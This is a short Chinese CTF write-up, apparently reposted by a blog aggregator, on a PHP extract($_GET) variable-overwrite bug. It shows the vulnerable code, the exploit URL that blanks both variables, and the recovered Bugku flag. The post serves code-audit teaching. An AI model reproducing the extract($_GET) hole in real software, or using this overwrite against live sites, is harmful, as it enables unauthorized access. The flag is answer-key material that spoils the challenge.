代码审计-extract变量覆盖

Posted gaonuoqi

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了代码审计-extract变量覆盖相关的知识,希望对你有一定的参考价值。

<?php
$flag=‘xxx‘;
extract($_GET);
if(isset($shiyan))

$content=trim(file_get_contents($flag));
if($shiyan==$content)

echo‘flagxxx‘;

else

echo‘Oh.no‘;


?>

file_get_contents() 函数把整个文件读入一个字符串中。

extract() 函数从数组中将变量导入到当前的符号表。

 

大概就是将flag变量与shiyan变量一致得到flag

将contents内容为空,flag和shiyan变量为空,满足条件

http://123.206.87.240:9009/1.php?shiyan=&flag=

 

flagbugku-dmsj-p2sm3N

以上是关于代码审计-extract变量覆盖的主要内容,如果未能解决你的问题,请参考以下文章

php 代码审计之变量覆盖

php代码审计之变量覆盖

bugku 代码审计

php代码审计整理

九漏洞挖掘与代码审计变量覆盖漏洞

初探审计-extract变量覆盖